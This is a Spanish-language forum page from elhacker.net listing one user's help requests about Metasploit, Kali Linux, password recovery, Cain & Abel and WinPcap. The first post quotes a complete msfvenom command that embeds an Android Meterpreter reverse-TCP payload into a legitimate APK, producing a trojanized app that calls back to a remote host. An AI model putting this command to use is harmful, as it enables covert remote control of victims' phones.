elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1]
1  Sistemas Operativos / GNU/Linux / Problema con `gsub' en metasploit en: 10 Noviembre 2020, 05:35 am
Alguien puede ayudarme con este problema? Ya instale de nuevo metasplot y aun sigue dando el error y no encuentro solucion.. :-\

Citar
sudo msfvenom -x appdebug.apk -p android/meterpreter/reverse_tcp lhost=xxx.xxx.x.xx lport=80 -o exploit.apk
Using APK template: appdebug.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
  • Creating signing key and keystore..
  • Decompiling original APK..
  • Decompiling payload APK..
  • Locating hook point..
Error: undefined method `gsub' for #<Nokogiri::XML::NodeSet:0x0000559b311010b8>
2  Informática / Hardware / USB 3.1 vs SSD en: 30 Marzo 2019, 21:20 pm
Hola amigos tenia una duda..
e booteado kali  en una USB 3.1 pero resulta muy lenta en modo persistente.

asi que queria saber que tan rapido es un Disco Duro de Estado solido(SSD).
es mas rapido que el usb 3.1?
ya que tenia pensado comprar uno y bootear kali en el .

gracias por su atencion amigos, espero sus respuestas.
3  Sistemas Operativos / GNU/Linux / Recuperar contraseña de linux en: 23 Diciembre 2017, 08:28 am
Disculpen amigos perdí mi contraseña de Linux Lite y quería preguntar si hay alguna forma de recuperarla o de cambiarla podrían ayudarme  :-X
4  Media / Multimedia / recuperar fotos o videos borrados? en: 5 Octubre 2017, 21:09 pm
hola buen dia foro les queria preguntar si conocen de algun metodo prara recuperar fotos y videos borrados o de alguna aplicacion o programa que pueda ayudarme? :D

espero su repuesta  :silbar: ,gracias de ante mano por su atencion ;-)
5  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / El mejor celular para instalar kali linux? en: 19 Julio 2017, 01:57 am
Hola amigos muy buenas noches
Vengo a hacerles una pregunta ya que muchos de ustedes tienen experiencia en kali
He oído que en celulares como el One Plus One se puede
Esto es cierto?
Como que modelo de esta marca me recomiendan?
Ay alguno mejor?
Necesito un celular con kali y con bastante memoria
Por favor ayudenme :P
Gracias!!! :-*
6  Seguridad Informática / Hacking / problema con contraseñas de Cain & Abel en: 17 Junio 2017, 08:54 am
Disculpen amigos necesito su ayuda, cuando uso cain me aaparecen los nombres de usuarios pero no las contraseñas, las contraseñas me aparecen me aparecen puros asteriscos alguien me podria ayudar porfavor muchas gracias ;D
7  Foros Generales / Dudas Generales / instalacion de WiPcaP en: 12 Junio 2017, 00:39 am
Muy buenas tarde amigos ,tengo problemas al instalar wipcap
Me aparece este mensaje:

error opening file for writing:
C:\WINDOWS\system32\wpcap.dll

y me dice que ya esta instalado

alguien puede ayudarme, gracias por su atencion saludos  :-\
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines